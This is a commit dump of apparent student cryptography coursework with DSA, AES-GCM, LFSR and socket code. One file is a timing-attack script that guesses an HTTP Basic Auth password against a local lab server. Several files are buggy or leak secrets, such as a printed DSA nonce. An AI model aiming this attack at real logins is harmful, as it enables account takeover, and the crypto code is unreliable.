poczatek
This commit is contained in:
commit
bf6aca3918
8
.idea/.gitignore
vendored
Normal file
8
.idea/.gitignore
vendored
Normal file
@ -0,0 +1,8 @@
|
||||
# Default ignored files
|
||||
/shelf/
|
||||
/workspace.xml
|
||||
# Editor-based HTTP Client requests
|
||||
/httpRequests/
|
||||
# Datasource local storage ignored files
|
||||
/dataSources/
|
||||
/dataSources.local.xml
|
15
.idea/cw1.iml
Normal file
15
.idea/cw1.iml
Normal file
@ -0,0 +1,15 @@
|
||||
<?xml version="1.0" encoding="UTF-8"?>
|
||||
<module type="PYTHON_MODULE" version="4">
|
||||
<component name="NewModuleRootManager">
|
||||
<content url="file://$MODULE_DIR$">
|
||||
<excludeFolder url="file://$MODULE_DIR$/lol" />
|
||||
<excludeFolder url="file://$MODULE_DIR$/venv" />
|
||||
<excludeFolder url="file://$MODULE_DIR$/venv2" />
|
||||
<excludeFolder url="file://$MODULE_DIR$/venv3" />
|
||||
<excludeFolder url="file://$MODULE_DIR$/venv4" />
|
||||
<excludeFolder url="file://$MODULE_DIR$/venv6" />
|
||||
</content>
|
||||
<orderEntry type="jdk" jdkName="Python 3.10 (cw1)" jdkType="Python SDK" />
|
||||
<orderEntry type="sourceFolder" forTests="false" />
|
||||
</component>
|
||||
</module>
|
19
.idea/inspectionProfiles/Project_Default.xml
Normal file
19
.idea/inspectionProfiles/Project_Default.xml
Normal file
@ -0,0 +1,19 @@
|
||||
<component name="InspectionProjectProfileManager">
|
||||
<profile version="1.0">
|
||||
<option name="myName" value="Project Default" />
|
||||
<inspection_tool class="DuplicatedCode" enabled="true" level="WEAK WARNING" enabled_by_default="true">
|
||||
<Languages>
|
||||
<language minSize="56" name="Python" />
|
||||
</Languages>
|
||||
</inspection_tool>
|
||||
<inspection_tool class="PyPep8NamingInspection" enabled="true" level="WEAK WARNING" enabled_by_default="true">
|
||||
<option name="ignoredErrors">
|
||||
<list>
|
||||
<option value="N806" />
|
||||
<option value="N803" />
|
||||
<option value="N802" />
|
||||
</list>
|
||||
</option>
|
||||
</inspection_tool>
|
||||
</profile>
|
||||
</component>
|
6
.idea/inspectionProfiles/profiles_settings.xml
Normal file
6
.idea/inspectionProfiles/profiles_settings.xml
Normal file
@ -0,0 +1,6 @@
|
||||
<component name="InspectionProjectProfileManager">
|
||||
<settings>
|
||||
<option name="USE_PROJECT_PROFILE" value="false" />
|
||||
<version value="1.0" />
|
||||
</settings>
|
||||
</component>
|
4
.idea/misc.xml
Normal file
4
.idea/misc.xml
Normal file
@ -0,0 +1,4 @@
|
||||
<?xml version="1.0" encoding="UTF-8"?>
|
||||
<project version="4">
|
||||
<component name="ProjectRootManager" version="2" project-jdk-name="Python 3.10 (cw1)" project-jdk-type="Python SDK" />
|
||||
</project>
|
8
.idea/modules.xml
Normal file
8
.idea/modules.xml
Normal file
@ -0,0 +1,8 @@
|
||||
<?xml version="1.0" encoding="UTF-8"?>
|
||||
<project version="4">
|
||||
<component name="ProjectModuleManager">
|
||||
<modules>
|
||||
<module fileurl="file://$PROJECT_DIR$/.idea/cw1.iml" filepath="$PROJECT_DIR$/.idea/cw1.iml" />
|
||||
</modules>
|
||||
</component>
|
||||
</project>
|
BIN
__pycache__/hmac.cpython-310.pyc
Normal file
BIN
__pycache__/hmac.cpython-310.pyc
Normal file
Binary file not shown.
62
bezp.py.txt
Normal file
62
bezp.py.txt
Normal file
@ -0,0 +1,62 @@
|
||||
import datetime
|
||||
import time
|
||||
|
||||
import requests
|
||||
from requests.auth import HTTPBasicAuth
|
||||
import string
|
||||
|
||||
url = "http://localhost:1234/authentication/example2/"
|
||||
username = "hacker"
|
||||
|
||||
print(string.ascii_lowercase + string.digits)
|
||||
|
||||
# czasem pierwsze zapytanie jest wolne
|
||||
requests.get(
|
||||
url=url,
|
||||
auth=HTTPBasicAuth(username, "haslo")
|
||||
)
|
||||
|
||||
haslo = ""
|
||||
# zeby sprawdzic tylko ostatni krok
|
||||
# haslo="p4ssw0r"
|
||||
|
||||
for i in range(24):
|
||||
odgadnieto = False
|
||||
najdluzszy_czas = None
|
||||
najdluzszy = None
|
||||
for c in (string.ascii_lowercase + string.digits):
|
||||
#czasy = []
|
||||
# czasem spowolnienia sa losowe wiec sprawdzam trzy razy
|
||||
#for i in range(3):
|
||||
# przeczekanie spowolnienia serwera
|
||||
#time.sleep(0.5)
|
||||
#url_response = requests.get(
|
||||
# url=url,
|
||||
# auth=HTTPBasicAuth(username, haslo + c)
|
||||
#)
|
||||
#czasy.append(url_response.elapsed)
|
||||
# jako poprawny traktowany srodkowy czas
|
||||
# czas=min(czasy)
|
||||
#czasy.sort()
|
||||
#czas = czasy[0]
|
||||
#print(c, czasy[0], czasy[1], czasy[2])
|
||||
url_response = requests.get(
|
||||
url=url,
|
||||
auth=HTTPBasicAuth(username, haslo + c)
|
||||
)
|
||||
czas = url_response.elapsed
|
||||
print(f"Sprawdzam: {haslo + c} Czas: {czas}")
|
||||
if najdluzszy_czas is None or czas >= najdluzszy_czas:
|
||||
najdluzszy_czas = czas
|
||||
najdluzszy = c
|
||||
if url_response.status_code == 200:
|
||||
odgadnieto = True
|
||||
najdluzszy = c
|
||||
haslo += c
|
||||
print("weszlo")
|
||||
print(haslo)
|
||||
break
|
||||
haslo = haslo + najdluzszy
|
||||
if odgadnieto:
|
||||
break
|
||||
print(haslo)
|
190
dsa.py
Normal file
190
dsa.py
Normal file
@ -0,0 +1,190 @@
|
||||
import sys
|
||||
from hashlib import sha256, sha384
|
||||
import os
|
||||
import random
|
||||
|
||||
byteorder = sys.byteorder
|
||||
|
||||
|
||||
def get_power_2_factors(n: int) -> (int, int):
|
||||
r = 0
|
||||
d = n
|
||||
while n > 0 and d % 2 == 0:
|
||||
d = d // 2
|
||||
r += 1
|
||||
return r, d
|
||||
|
||||
|
||||
def miller_rabin_prime_test(n: int, k: int = 64) -> bool:
|
||||
# Factor powers of 2 from n - 1 s.t. n - 1 = 2^r * d
|
||||
r, d = get_power_2_factors(n - 1)
|
||||
|
||||
for i in range(k):
|
||||
a = get_random_bits(n.bit_length())
|
||||
while a not in range(2, n - 2 + 1):
|
||||
a = get_random_bits(n.bit_length())
|
||||
x = pow(a, d, n)
|
||||
if x == 1 or x == n - 1:
|
||||
continue
|
||||
n_1_found = False
|
||||
for j in range(r - 1):
|
||||
x = pow(x, 2, n)
|
||||
if x == n - 1:
|
||||
n_1_found = True
|
||||
break
|
||||
if not n_1_found:
|
||||
return False
|
||||
return True
|
||||
|
||||
|
||||
def get_random_bits(bit_length: int) -> int:
|
||||
return int.from_bytes(os.urandom((bit_length + 7) // 8), 'big')
|
||||
|
||||
|
||||
def bezpieczny_randint(poczatek_inkluzywny, koniec_ekskluzywny):
|
||||
dlugosc_przedzialu = koniec_ekskluzywny - poczatek_inkluzywny
|
||||
maksymalna_liczba_bitow_zapisu = dlugosc_przedzialu.bit_length()
|
||||
# liczba miedzy 0 a 2**maksymalna_liczba_bitow_zapisu
|
||||
wyn = get_random_bits(maksymalna_liczba_bitow_zapisu)
|
||||
# liczba miedzy 0 a dlugosc_przedzialu
|
||||
while wyn >= dlugosc_przedzialu:
|
||||
wyn = get_random_bits(maksymalna_liczba_bitow_zapisu)
|
||||
# liczba miedzy poczatek_inkluzywny a koniec_ekskluzywny
|
||||
wyn = poczatek_inkluzywny + wyn
|
||||
return wyn
|
||||
|
||||
|
||||
def generate_prime_number(bit_length: int) -> int:
|
||||
# prime needs to be in range [2^(n-1), 2^n-1]
|
||||
low = pow(2, bit_length - 1)
|
||||
high = pow(2, bit_length) - 1
|
||||
|
||||
while True:
|
||||
|
||||
# Generate odd prime candidate in range
|
||||
candidate_prime = get_random_bits(bit_length)
|
||||
while candidate_prime not in range(low, high + 1) or not candidate_prime % 2:
|
||||
candidate_prime = get_random_bits(bit_length)
|
||||
|
||||
# with k rounds, miller rabin test gives false positive with probability (1/4)^k = 1/(2^2k)
|
||||
k = 64
|
||||
if miller_rabin_prime_test(candidate_prime, k):
|
||||
return candidate_prime
|
||||
|
||||
|
||||
def rozszerzony_algorytm_euklidesa(a0, b0):
|
||||
a, b = a0, b0
|
||||
x, y = 1, 0
|
||||
r, s = 0, 1
|
||||
while b != 0:
|
||||
c = a % b
|
||||
q = a // b
|
||||
a, b = b, c
|
||||
r_pom, s_pom = r, s
|
||||
r = x - q * r
|
||||
s = y - q * s
|
||||
x, y = r_pom, s_pom
|
||||
nwd = x * a0 + y * b0
|
||||
return a, x, y, nwd
|
||||
|
||||
|
||||
def NWD(a, b):
|
||||
nwd1, _, _, nwd2 = rozszerzony_algorytm_euklidesa(a, b)
|
||||
if nwd1 == nwd2:
|
||||
return nwd1
|
||||
else:
|
||||
return None
|
||||
|
||||
|
||||
def odwrotnosc_modulo(a, n):
|
||||
_, x, y, _ = rozszerzony_algorytm_euklidesa(a, n)
|
||||
if a != 1 and x == 1:
|
||||
odwrotnosc_a = "nie ma elementu odwrotnego"
|
||||
elif x > 0:
|
||||
odwrotnosc_a = x % n
|
||||
else:
|
||||
odwrotnosc_a = (n + x) % n
|
||||
return odwrotnosc_a
|
||||
|
||||
|
||||
def szybkie_potegowanie_modulo(podstawa, wykladnik, rzad):
|
||||
pom = 1
|
||||
while wykladnik > 1:
|
||||
ostatni_bit = wykladnik & 1
|
||||
wykladnik >>= 1
|
||||
if ostatni_bit == 1:
|
||||
pom = (pom * podstawa) % rzad
|
||||
podstawa = (podstawa * podstawa) % rzad
|
||||
return (podstawa * pom) % rzad
|
||||
|
||||
|
||||
def genDSA():
|
||||
q = generate_prime_number(160)
|
||||
print("q", q.bit_length())
|
||||
t = bezpieczny_randint(0, 9)
|
||||
print("t", t, 512 + 64 * t)
|
||||
k = 2 ** (511 - 160 + 1 + 64 * t)
|
||||
while True:
|
||||
p = k * q + 1
|
||||
if miller_rabin_prime_test(p, 64):
|
||||
break
|
||||
k += 1
|
||||
print("p", p.bit_length())
|
||||
while True:
|
||||
g = bezpieczny_randint(2 ** (p.bit_length() - 1), 2 ** (p.bit_length()))
|
||||
alfa = szybkie_potegowanie_modulo(g, (p - 1) // q, p)
|
||||
if alfa != 1:
|
||||
break
|
||||
print("g, alfa", g.bit_length(), alfa.bit_length())
|
||||
a = bezpieczny_randint(1, q)
|
||||
y = szybkie_potegowanie_modulo(alfa, a, p)
|
||||
# tlumaczenie symboli
|
||||
p, q, g, y, x = p, q, alfa, y, a
|
||||
klucz_publiczny_DSA = (p, q, g, y)
|
||||
klucz_prywatny_DSA = x
|
||||
return klucz_publiczny_DSA, klucz_prywatny_DSA
|
||||
|
||||
|
||||
def sig_DSA(p, q, g, x, m):
|
||||
byteorder = sys.byteorder
|
||||
k = get_random_bits(q.bit_length())
|
||||
print("k", k)
|
||||
r = szybkie_potegowanie_modulo(g, k, p) % q
|
||||
print("r", r)
|
||||
H_od_m = sha256(m).digest()
|
||||
int_H_od_m = int.from_bytes(H_od_m, byteorder)
|
||||
s = (odwrotnosc_modulo(k, q) * (int_H_od_m + x * r)) % q
|
||||
print("s", s)
|
||||
return r, s
|
||||
|
||||
|
||||
def ver_DSA(p, q, g, y, m, r, s):
|
||||
byteorder = sys.byteorder
|
||||
if not (0 < r and s < q):
|
||||
print("zle")
|
||||
H_od_m = sha256(m).digest()
|
||||
int_H_od_m = int.from_bytes(H_od_m, byteorder)
|
||||
u1 = (odwrotnosc_modulo(s, q) * int_H_od_m) % q
|
||||
u2 = (r * odwrotnosc_modulo(s, q)) % q
|
||||
v = ((szybkie_potegowanie_modulo(g, u1, p) * szybkie_potegowanie_modulo(y, u2, p)) % p) % q
|
||||
print("r", r)
|
||||
print("v", v)
|
||||
if v == r:
|
||||
b = 1
|
||||
else:
|
||||
b = 0
|
||||
return b
|
||||
|
||||
|
||||
print("DSA")
|
||||
klucz_publiczny_DSA, klucz_prywatny_DSA = genDSA()
|
||||
print(klucz_publiczny_DSA, klucz_prywatny_DSA)
|
||||
p, q, g, y = klucz_publiczny_DSA
|
||||
x = klucz_prywatny_DSA
|
||||
|
||||
m = "Thats my Kung Fu".encode("ASCII")
|
||||
print(m)
|
||||
r, s = sig_DSA(p, q, g, x, m)
|
||||
print(r, s)
|
||||
b = ver_DSA(p, q, g, y, m, r, s)
|
||||
print(b)
|
266
gcm.py
Normal file
266
gcm.py
Normal file
@ -0,0 +1,266 @@
|
||||
import math
|
||||
from cryptography.hazmat.primitives.ciphers import Cipher
|
||||
from cryptography.hazmat.primitives.ciphers.algorithms import AES
|
||||
from cryptography.hazmat.primitives.ciphers.modes import GCM, ECB
|
||||
import os
|
||||
from cryptography.hazmat.primitives.ciphers.aead import AESGCM
|
||||
|
||||
|
||||
def aes_gcm_authenticated_decryption(key, iv, auth_tag, associated_data, ciphertext):
|
||||
aes_gcm_decryptor = Cipher(AES(key), GCM(iv, auth_tag)).decryptor()
|
||||
aes_gcm_decryptor.authenticate_additional_data(associated_data)
|
||||
recovered_plaintext = aes_gcm_decryptor.update(ciphertext) + aes_gcm_decryptor.finalize()
|
||||
return recovered_plaintext, auth_tag
|
||||
|
||||
|
||||
def xor_bytes(bytes_a: bytes, bytes_b: bytes) -> bytes:
|
||||
return bytes([a ^ b for (a, b) in zip(bytes_a, bytes_b)])
|
||||
|
||||
|
||||
def MUL(X_bytes, Y_bytes):
|
||||
X = int.from_bytes(X_bytes, 'big')
|
||||
Y = int.from_bytes(Y_bytes, 'big')
|
||||
# Constant R defined for algorithm
|
||||
R = 0xe1 << 120
|
||||
# Step 1
|
||||
x = [1 if X & (1 << i) else 0 for i in range(127, -1, -1)]
|
||||
# Steps 2 and 3
|
||||
Z_i = 0
|
||||
V_i = Y
|
||||
for i in range(128):
|
||||
if x[i] == 0:
|
||||
Z_i_1 = Z_i
|
||||
else:
|
||||
Z_i_1 = Z_i ^ V_i
|
||||
if V_i % 2 == 0:
|
||||
V_i_1 = V_i >> 1
|
||||
else:
|
||||
V_i_1 = (V_i >> 1) ^ R
|
||||
Z_i = Z_i_1
|
||||
V_i = V_i_1
|
||||
# Step 4
|
||||
return Z_i.to_bytes(16, 'big')
|
||||
|
||||
|
||||
def GHASH(H, X):
|
||||
# Input constraint: len(X) = 128m
|
||||
# 128/8=16 bo bajty
|
||||
m = len(X) // 16
|
||||
# Step 1
|
||||
X_blocks = [X[i * 16:(i + 1) * 16] for i in range(m)]
|
||||
# Step 2
|
||||
# b'\x00' = 00000000
|
||||
Y_0 = b'\x00' * 16
|
||||
# Step 3
|
||||
Y_i_1 = Y_0
|
||||
for i in range(m):
|
||||
X_i = X_blocks[i]
|
||||
Y_i = MUL(xor_bytes(Y_i_1, X_i), H)
|
||||
Y_i_1 = Y_i
|
||||
# Step 4
|
||||
return Y_i_1
|
||||
|
||||
|
||||
def INC_32(Y_bytes):
|
||||
Y = int.from_bytes(Y_bytes, 'big')
|
||||
Y_inc = ((Y >> 32) << 32) ^ (((Y & 0xffffffff) + 1) & 0xffffffff)
|
||||
return Y_inc.to_bytes(16, 'big')
|
||||
|
||||
|
||||
def GCTR(K, ICB, X):
|
||||
# Step 1
|
||||
if not X:
|
||||
return b''
|
||||
|
||||
# Step 2
|
||||
n = math.ceil(len(X) / 16)
|
||||
|
||||
# Step 3
|
||||
X_blocks = [X[i * 16:(i + 1) * 16] for i in range(n)]
|
||||
|
||||
# Step 4
|
||||
CB = [ICB]
|
||||
|
||||
# Step 5
|
||||
for i in range(1, n):
|
||||
CB_i = INC_32(CB[i - 1])
|
||||
CB.append(CB_i)
|
||||
|
||||
# Steps 6 and 7
|
||||
Y_blocks = []
|
||||
for i in range(n):
|
||||
X_i = X_blocks[i]
|
||||
CB_i = CB[i]
|
||||
aes_encryptor = Cipher(AES(K), ECB()).encryptor()
|
||||
ciphertext = aes_encryptor.update(CB_i) + aes_encryptor.finalize()
|
||||
# Y_i = xor_bytes(X_i, aes_encryption(CB_i, K))
|
||||
Y_i = xor_bytes(X_i, ciphertext)
|
||||
Y_blocks.append(Y_i)
|
||||
|
||||
# Step 8
|
||||
Y = b''.join(Y_blocks)
|
||||
|
||||
# Step 9
|
||||
return Y
|
||||
|
||||
|
||||
def aes_gcm_encrypt(P, K, IV, A, t):
|
||||
# Step 1
|
||||
data = (b'\x00' * 16)
|
||||
aes_encryptor = Cipher(AES(K), ECB()).encryptor()
|
||||
H = aes_encryptor.update(data) + aes_encryptor.finalize()
|
||||
# Step 2
|
||||
len_IV = len(IV) * 8
|
||||
if len_IV == 96:
|
||||
J_0 = IV + b'\x00\x00\x00\x01'
|
||||
else:
|
||||
s = 128 * math.ceil(len_IV / 128) - len_IV
|
||||
O_s_64 = b'\x00' * ((s + 64) // 8)
|
||||
len_IV_64 = int.to_bytes(len_IV, 8, 'big')
|
||||
J_0 = GHASH(H, IV + O_s_64 + len_IV_64)
|
||||
|
||||
# Step 3
|
||||
C = GCTR(K, INC_32(J_0), P)
|
||||
|
||||
# Step 4
|
||||
len_C, len_A = len(C) * 8, len(A) * 8
|
||||
u = 128 * math.ceil(len_C / 128) - len_C
|
||||
v = 128 * math.ceil(len_A / 128) - len_A
|
||||
|
||||
# Step 5
|
||||
O_v = b'\x00' * (v // 8)
|
||||
O_u = b'\x00' * (u // 8)
|
||||
len_A_64 = int.to_bytes(len_A, 8, 'big')
|
||||
len_C_64 = int.to_bytes(len_C, 8, 'big')
|
||||
S = GHASH(H, A + O_v + C + O_u + len_A_64 + len_C_64)
|
||||
|
||||
# Step 6
|
||||
T = GCTR(K, J_0, S)[:t // 8] # Assumes tag length multiple of 8
|
||||
|
||||
# Step 7
|
||||
return C, T
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
# NIST Special Publication 800-38D
|
||||
|
||||
# NIST test vector 1
|
||||
key = bytearray.fromhex('11754cd72aec309bf52f7687212e8957')
|
||||
iv = bytearray.fromhex('3c819d9a9bed087615030b65')
|
||||
plaintext = bytearray.fromhex('')
|
||||
associated_data = bytearray.fromhex('')
|
||||
expected_ciphertext = bytearray.fromhex('')
|
||||
expected_tag = bytearray.fromhex('250327c674aaf477aef2675748cf6971')
|
||||
tag_length = 128
|
||||
|
||||
ciphertext, auth_tag = aes_gcm_encrypt(plaintext, key, iv, associated_data, tag_length)
|
||||
|
||||
assert (ciphertext == expected_ciphertext)
|
||||
assert (auth_tag == expected_tag)
|
||||
|
||||
message, _ = aes_gcm_authenticated_decryption(key, iv, auth_tag, associated_data, ciphertext)
|
||||
print("wiadomosc:")
|
||||
print(plaintext)
|
||||
print("otrzymana wiadomosc:")
|
||||
print(message)
|
||||
|
||||
# NIST test vector 2
|
||||
key = bytearray.fromhex('fe47fcce5fc32665d2ae399e4eec72ba')
|
||||
iv = bytearray.fromhex('5adb9609dbaeb58cbd6e7275')
|
||||
plaintext = bytearray.fromhex('7c0e88c88899a779228465074797cd4c2e1498d259b54390b85e3eef1c02df60e743f1b840382c4bccaf'
|
||||
'3bafb4ca8429bea063')
|
||||
associated_data = bytearray.fromhex('88319d6e1d3ffa5f987199166c8a9b56c2aeba5a')
|
||||
expected_ciphertext = bytearray.fromhex('98f4826f05a265e6dd2be82db241c0fbbbf9ffb1c173aa83964b7cf5393043736365253ddb'
|
||||
'c5db8778371495da76d269e5db3e')
|
||||
expected_tag = bytearray.fromhex('291ef1982e4defedaa2249f898556b47')
|
||||
tag_length = 128
|
||||
|
||||
ciphertext, auth_tag = aes_gcm_encrypt(plaintext, key, iv, associated_data, tag_length)
|
||||
|
||||
assert (ciphertext == expected_ciphertext)
|
||||
assert (auth_tag == expected_tag)
|
||||
|
||||
message, _ = aes_gcm_authenticated_decryption(key, iv, auth_tag, associated_data, ciphertext)
|
||||
print("wiadomosc:")
|
||||
print(plaintext)
|
||||
print("otrzymana wiadomosc:")
|
||||
print(message)
|
||||
|
||||
# NIST test vector 3
|
||||
key = bytearray.fromhex('c7d9358af0fd737b118dbf4347fd252a')
|
||||
iv = bytearray.fromhex('83de9fa52280522b55290ebe3b067286d87690560179554153cb3341a04e15c5f35390602fa07e5b5f16dc38cf0'
|
||||
'82b11ad6dd3fab8552d2bf8d9c8981bbfc5f3b57e5e3066e3df23f078fa25bce63d3d6f86ce9fbc2c679655b958'
|
||||
'b09a991392eb93b453ba6e7bf8242f8f61329e3afe75d0f8536aa7e507d75891e540fb1d7e')
|
||||
plaintext = bytearray.fromhex('422f46223fddff25fc7a6a897d20dc8af6cc8a37828c90bd95fa9b943f460eb0a26f29ffc483592efb64'
|
||||
'835774160a1bb5c0cd')
|
||||
associated_data = bytearray.fromhex('5d2b9a4f994ffaa03000149956c8932e85b1a167294514e388b73b10808f509ea73c075ecbf43c'
|
||||
'ecfec13c202afed62110dabf8026d237f4e765853bc078f3afe081d0a1f8d8f7556b8e42acc3cc'
|
||||
'e888262185048d67c55b2df1')
|
||||
expected_ciphertext = bytearray.fromhex('86eba4911578ac72ac30c25fe424da9ab625f29b5c00e36d2c24a2733dc40123dc57a8c9f1'
|
||||
'7a24a26c09c73ad4efbcba3bab5b')
|
||||
expected_tag = bytearray.fromhex('492305190344618cab8b40f006a57186')
|
||||
tag_length = 128
|
||||
|
||||
ciphertext, auth_tag = aes_gcm_encrypt(plaintext, key, iv, associated_data, tag_length)
|
||||
|
||||
assert (ciphertext == expected_ciphertext)
|
||||
assert (auth_tag == expected_tag)
|
||||
|
||||
message, _ = aes_gcm_authenticated_decryption(key, iv, auth_tag, associated_data, ciphertext)
|
||||
print("wiadomosc:")
|
||||
print(plaintext)
|
||||
print("otrzymana wiadomosc:")
|
||||
print(message)
|
||||
|
||||
print("\n" * 10)
|
||||
# wlasne
|
||||
key = AESGCM.generate_key(bit_length=128) # bytearray.fromhex('11754cd72aec309bf52f7687212e8957')
|
||||
iv = bytearray.fromhex('3c819d9a9bed087615030b65')
|
||||
|
||||
plaintext = "wiadomosc1".encode()
|
||||
associated_data = "potwierdzenie".encode()
|
||||
ciphertext, auth_tag = aes_gcm_encrypt(plaintext, key, iv, associated_data, tag_length)
|
||||
|
||||
print(ciphertext)
|
||||
print(auth_tag)
|
||||
|
||||
message, _ = aes_gcm_authenticated_decryption(key, iv, auth_tag, associated_data, ciphertext)
|
||||
print(message)
|
||||
|
||||
data = b"wiadomosc1"
|
||||
aad = b"potwierdzenie"
|
||||
|
||||
aesgcm = AESGCM(key)
|
||||
nonce = iv # os.urandom(12)
|
||||
|
||||
ct = aesgcm.encrypt(nonce, data, aad)
|
||||
print(ct)
|
||||
|
||||
msg = aesgcm.decrypt(nonce, ct, aad)
|
||||
print(msg)
|
||||
|
||||
# przykladowe dane 10
|
||||
|
||||
print("\n" * 5)
|
||||
# wlasne
|
||||
key = bytearray.fromhex('feffe9928665731c6d6a8f9467308308feffe9928665731c')
|
||||
iv = bytearray.fromhex('cafebabefacedbaddecaf888')
|
||||
plaintext = bytearray.fromhex(
|
||||
"d9313225f88406e5a55909c5aff5269a86a7a9531534f7da2e4c303d8a318a721c3c0c95956809532fcf0e2449a6b525b16aedf5aa0de657ba637b39")
|
||||
associated_data = bytearray.fromhex("feedfacedeadbeeffeedfacedeadbeefabaddad2")
|
||||
|
||||
# wlasne
|
||||
ciphertext, auth_tag = aes_gcm_encrypt(plaintext, key, iv, associated_data, tag_length)
|
||||
print(ciphertext.hex(), auth_tag.hex(), sep="")
|
||||
|
||||
message, _ = aes_gcm_authenticated_decryption(key, iv, auth_tag, associated_data, ciphertext)
|
||||
print(message.hex())
|
||||
|
||||
# gotowe
|
||||
aesgcm = AESGCM(key)
|
||||
|
||||
ciphertext = aesgcm.encrypt(iv, plaintext, associated_data)
|
||||
print(ciphertext.hex())
|
||||
|
||||
message = aesgcm.decrypt(iv, ciphertext, associated_data)
|
||||
print(message.hex())
|
36
hmac.py
Normal file
36
hmac.py
Normal file
@ -0,0 +1,36 @@
|
||||
def gcm_add(x, y):
|
||||
return x ^ y
|
||||
|
||||
def gcm_multiply(x, y, poly):
|
||||
z = 0
|
||||
for _ in range(poly.bit_length()):
|
||||
if y & 1:
|
||||
z ^= x
|
||||
hi_bit_set = x & (1 << poly.bit_length() - 1)
|
||||
x <<= 1
|
||||
if hi_bit_set:
|
||||
x ^= poly
|
||||
y >>= 1
|
||||
return z
|
||||
|
||||
def incr(x):
|
||||
y=1%(2^32)
|
||||
wyn = x+y
|
||||
if wyn >= 2^32:
|
||||
wyn=1%(2^32)
|
||||
return wyn
|
||||
|
||||
a = 0b0001
|
||||
b = 0b0101
|
||||
print(a,b)
|
||||
print(bin(a),bin(b))
|
||||
polynomial = 0xE1000000000000000000000000000000
|
||||
|
||||
result = gcm_multiply(a, b, polynomial)
|
||||
print("GCM Multiplication Result:", bin(result))
|
||||
|
||||
result = gcm_add(a, b)
|
||||
print("GCM Addition Result:", bin(result))
|
||||
|
||||
print(incr(1))
|
||||
print(incr((2^32)-1))
|
21
klient.py
Normal file
21
klient.py
Normal file
@ -0,0 +1,21 @@
|
||||
# https://realpython.com/python-sockets/
|
||||
# echo-client.py
|
||||
import socket
|
||||
|
||||
HOST = "150.254.79.26"
|
||||
PORT = 65432 # The port used by the server
|
||||
|
||||
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
|
||||
s.connect((HOST, PORT))
|
||||
klucz_publiczny = s.recv(16384)
|
||||
print(klucz_publiczny)
|
||||
do_podpisania = b"Hello, world"
|
||||
s.sendall(do_podpisania)
|
||||
podpis = s.recv(4096)
|
||||
|
||||
print(f"Received {podpis}")
|
||||
p, q, g, y = klucz_publiczny_DSA
|
||||
m = do_podpisania
|
||||
r, s = podpis
|
||||
weryfikacja_DSA = ver_DSA(p, q, g, y, m, r, s)
|
||||
print(weryfikacja_DSA)
|
75
main.py
Normal file
75
main.py
Normal file
@ -0,0 +1,75 @@
|
||||
# r_podwojne = b"01001001001001000011101101101111011110"
|
||||
|
||||
N = 8
|
||||
# r od n
|
||||
r1 = b"11111111"
|
||||
r2 = b"11111111"
|
||||
r1 = (int(r1, 2)) + (1 << N)
|
||||
r2 = (int(r2, 2)) + (1 << N)
|
||||
# t od 1
|
||||
t1 = b"10001110"
|
||||
t2 = b"10010101"
|
||||
t1 = (int(t1, 2)) + (1 << N)
|
||||
t2 = (int(t2, 2)) + (1 << N)
|
||||
#
|
||||
pdpkt_a = b"000011"
|
||||
pdkpt_b = b"101001"
|
||||
pdpkt_a = (int(pdpkt_a, 2)) + (1 << N)
|
||||
pdkpt_b = (int(pdkpt_b, 2)) + (1 << N)
|
||||
|
||||
def nastepny_bit(r, t):
|
||||
rc = r
|
||||
tc = t
|
||||
wyn = None
|
||||
#print(bin(rc))
|
||||
#print(bin(tc))
|
||||
for i in range(N):
|
||||
bit = rc & 1
|
||||
bit_z_t = tc & 1
|
||||
if bit_z_t == 1:
|
||||
if wyn == None:
|
||||
wyn = bit
|
||||
else:
|
||||
wyn = wyn ^ bit
|
||||
rc = rc >> 1
|
||||
tc = tc >> 1
|
||||
#print(bit)
|
||||
#print(wyn)
|
||||
#print(bin(rc))
|
||||
#print(bin(tc))
|
||||
#print("xor", bin(wyn))
|
||||
wywalane_z_r = r & 1
|
||||
#print("r", bin(r))
|
||||
r = r >> 1
|
||||
#print("podzielone", bin(r))
|
||||
r = r - (1 << N - 1)
|
||||
r = r + (wyn << N - 1)
|
||||
r = r + (1 << N)
|
||||
#print("r dodane", bin(r))
|
||||
return r, wywalane_z_r
|
||||
|
||||
|
||||
#r1, b = nastepny_bit(r1, t1)
|
||||
#print(bin(r1))
|
||||
#print(b)
|
||||
|
||||
|
||||
def shrinking_generator(r1, r2, t1, t2,rundy=10000):
|
||||
wyn = []
|
||||
for i in range(rundy):
|
||||
r1, l1 = nastepny_bit(r1, t1)
|
||||
r2, l2 = nastepny_bit(r2, t2)
|
||||
if l1 == 1:
|
||||
wyn.append(l2)
|
||||
print(l2, end="")
|
||||
if i>0 and i%500==0:
|
||||
print()
|
||||
print()
|
||||
return wyn
|
||||
|
||||
wyn = shrinking_generator(r1,r2,t1,t2)
|
||||
print(len(wyn))
|
||||
|
||||
wyn = shrinking_generator(pdpkt_a,pdkpt_b,pdpkt_a,pdkpt_b)
|
||||
print(len(wyn))
|
||||
print(wyn)
|
282
rsa.py
Normal file
282
rsa.py
Normal file
@ -0,0 +1,282 @@
|
||||
import sys
|
||||
from hashlib import sha256, sha384
|
||||
import os
|
||||
import random
|
||||
|
||||
byteorder = sys.byteorder
|
||||
|
||||
|
||||
def get_power_2_factors(n: int) -> (int, int):
|
||||
r = 0
|
||||
d = n
|
||||
while n > 0 and d % 2 == 0:
|
||||
d = d // 2
|
||||
r += 1
|
||||
return r, d
|
||||
|
||||
|
||||
def miller_rabin_prime_test(n: int, k: int = 64) -> bool:
|
||||
# Factor powers of 2 from n - 1 s.t. n - 1 = 2^r * d
|
||||
r, d = get_power_2_factors(n - 1)
|
||||
|
||||
for i in range(k):
|
||||
a = get_random_bits(n.bit_length())
|
||||
while a not in range(2, n - 2 + 1):
|
||||
a = get_random_bits(n.bit_length())
|
||||
x = pow(a, d, n)
|
||||
if x == 1 or x == n - 1:
|
||||
continue
|
||||
n_1_found = False
|
||||
for j in range(r - 1):
|
||||
x = pow(x, 2, n)
|
||||
if x == n - 1:
|
||||
n_1_found = True
|
||||
break
|
||||
if not n_1_found:
|
||||
return False
|
||||
return True
|
||||
|
||||
|
||||
def get_random_bits(bit_length: int) -> int:
|
||||
return int.from_bytes(os.urandom((bit_length + 7) // 8), 'big')
|
||||
|
||||
|
||||
def bezpieczny_randint(poczatek_inkluzywny, koniec_ekskluzywny):
|
||||
dlugosc_przedzialu = koniec_ekskluzywny-poczatek_inkluzywny
|
||||
maksymalna_liczba_bitow_zapisu = dlugosc_przedzialu.bit_length()
|
||||
# liczba miedzy 0 a 2**maksymalna_liczba_bitow_zapisu
|
||||
